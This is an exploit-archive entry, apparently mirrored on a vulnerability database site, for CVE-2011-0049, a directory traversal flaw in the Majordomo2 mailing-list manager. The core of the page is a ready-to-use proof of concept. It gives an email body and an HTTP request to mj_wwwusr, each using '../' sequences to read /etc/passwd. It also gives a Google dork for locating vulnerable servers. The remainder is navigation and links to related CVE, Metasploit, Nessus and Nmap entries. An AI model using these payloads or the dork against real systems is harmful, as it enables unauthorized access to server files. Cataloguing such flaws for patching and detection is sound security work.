Lucene search
K
Database
Vendors
Products
Years
CVSS
Scanner
Agent Scanning
API Scanning
Manual Audit
Perimeter Scanner
Scanning
Projects
Email
Webhook
Plugins
Resources
Documents
Blog
Glossary
FAQ
Pricing
Contacts
About Us
Partners
Branding Guideline
zdtMichael Brooks1337DAY-ID-15125
HistoryFeb 03, 2011 - 12:00 a.m.

Majordomo2 - Directory Traversal (SMTP/HTTP)

2011-02-0300:00:00
Michael Brooks
0day.today
21
JSON

Exploit for multiple platform in category remote exploits

Credit: Michael Brooks (https://sitewat.ch)
Vulnerability:  Directory Traversal
Software: Majordomo2
Identifier:CVE-2011-0049
Vendor: http://www.mj2.org/
Affected Build: 20110121 and prior
Google dork:inurl:mj_wwwusr
 
Special thanks to Dave Miller,  Reed Loden and the rest of the Mozilla
security team for handling the issue.
 
This vulnerability is exploitable via ALL of Majordomo2's interfaces.
*Including
e-mail*.  Send an email to majordomo's mail interface (for example:
[emailΒ protected]) with the body of the message as follows:
help ../../../../../../../../../../../../../etc/passwd
 
I'll give you one guess as to the contents of the response email ;).
 
PoC for HTTP:
http://localhost/cgi-bin/mj_wwwusr?passw=&list=GLOBAL&user=&func=help&extra=/../../../../../../../../etc/passwd



#  0day.today [2018-04-14]  #

Related

d2 1
seebug 1
cve 2
cert 1
prion 2
exploitpack 1
cvelist 2
packetstorm 2
securityvulns 2
nvd 2
nuclei 1
metasploit 1
nessus 1
openvas 1
exploitdb 1
dsquare 1
nmap 1
thn 1
d2
d2
DSquare Exploit Pack: D2SEC_MAJORDOMO
2011-02-04 01:00:00
seebug
seebug
Majordomo2 - Directory Traversal (SMTP/HTTP)
2014-07-01 00:00:00
cve
cve
CVE-2011-0049
2011-02-04 01:00:07
CVE-2011-0063
2011-03-15 17:55:02
cert
cert
Majordomo 2 _list_file_get() directory traversal vulnerability
2011-02-04 00:00:00
prion
prion
Directory traversal
2011-02-04 01:00:00
Directory traversal
2011-03-15 17:55:00
exploitpack
exploitpack
Majordomo2 - SMTPHTTP Directory Traversal
2011-02-03 00:00:00
cvelist
cvelist
CVE-2011-0049
2011-02-04 00:00:00
CVE-2011-0063
2011-03-15 17:00:00
packetstorm
packetstorm
Majordomo2 20110121 Directory Traversal
2011-02-02 00:00:00
Majordomo2 _list_file_get() Directory Traversal
2024-09-01 00:00:00
securityvulns
securityvulns
Majordomo2 directory traversal
2011-03-10 00:00:00
Majordomo2 - Directory Traversal (SMTP/HTTP)
2011-02-03 00:00:00
nvd
nvd
CVE-2011-0049
2011-02-04 01:00:07
CVE-2011-0063
2011-03-15 17:55:02
nuclei
nuclei
Majordomo2 - SMTP/HTTP Directory Traversal
2021-04-18 10:16:06
metasploit
metasploit
Majordomo2 _list_file_get() Directory Traversal
2011-03-12 16:38:51
nessus
nessus
Majordomo 2 _list_file_get() Function Traversal Arbitrary File Access
2011-02-16 00:00:00
openvas
openvas
Majordomo2 Directory Traversal Vulnerability
2011-02-07 00:00:00
exploitdb
exploitdb
Majordomo2 - 'SMTP/HTTP' Directory Traversal
2011-02-03 00:00:00
dsquare
dsquare
Majordomo 2 File Disclosure
2012-04-27 00:00:00
nmap
nmap
http-majordomo2-dir-traversal NSE Script
2011-06-27 20:22:25
thn
thn
Nmap 5.59 BETA1 - 40 new NSE scripts & improved IPv6
2011-07-01 11:41:00
JSON
Related for 1337DAY-ID-15125
d21seebug1cve2cert1prion2exploitpack1cvelist2packetstorm2securityvulns2nvd2nuclei1metasploit1nessus1openvas1exploitdb1dsquare1nmap1thn1